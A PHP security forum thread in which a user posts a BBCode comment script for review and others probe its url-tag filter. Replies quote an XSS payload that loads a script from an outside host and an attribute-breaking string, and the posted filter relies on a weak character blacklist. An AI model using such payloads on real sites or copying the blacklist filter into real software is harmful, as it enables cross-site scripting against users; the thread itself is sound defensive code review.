Form Security Advices?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Form Security Advices?

Post by kaisellgren »

Greetings dear members!

I have been reading thousands of articles of PHP security and I wrote a simple comment script.

Can you find anything 'evilish' or even annoying bugs?

Code: Select all

<?php

$message = $_POST["message"];

/*
 No HTML accepted directly. Only accepted using through BBCode.
*/
$message = htmlspecialchars($message);

/*
 Convert line feeds and carriage returns to <br /> tag.
*/
$message = preg_replace("/\x0D\x0A/","<br />",$message);

/*
 Replacing all BBCode URL tags [url=xxx]yyy[/url] with working HTML anchors
 IF the xxx has NOT characters '(', ')' or ';'.
 
 This makes it possible to use any protocol in anchors that does not carry anything dangerous.
 For example 'mailto:example@host.com' is valid while 'javascript: alert();' is not.
 
 The reason why I like this method is that when you type '[url=javascript:alert("hacked");]click[/url]',
 it will not be stripped off or even modified - it will be shown as it is: '[url=javascript:alert("hacked");]click[/url]'.
*/
$message = preg_replace("/\[url=([^\]\(\);]+?)\](.+?)\[\/url\]/i","<a href=\"\\1\">\\2</a>",$message);

echo $message;

?>
I really want it to be totally 'unhackable'. ANY advices taken.

Thank you for your time! :)
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Post by kaisellgren »

feyd wrote:Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.
I read something from Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?

What kind of injection is the url tag vulnerable? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but how cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tryed anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE ?
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

I read something from Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
What kind of injection is the url tag vulnerable? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but how cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tryed anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE ?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't: see this:

Code: Select all

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Post by kaisellgren »

Ambush Commander wrote:
I read something from Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
What kind of injection is the url tag vulnerable? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but how cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tryed anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE ?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't: see this:

Code: Select all

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.
Strange, but this sdfsd is outputted to sdfsd without any html anchors. Why? In my regex there are only ](); listed so it should make it anchor. Perhaps some security thing in PHP? Also this outputs only text:

Code: Select all

[url=">Hmm<"]sdfsd[/url]
Nothing dangerous in that, just tested. Or did I type something wrong? I guess you tried to break the html anchor tag with "> and the output hmm, but didn't work though.

EDIT: I realized. Your both first and second methods don't work because I used htmlspecialchars() !
Post Reply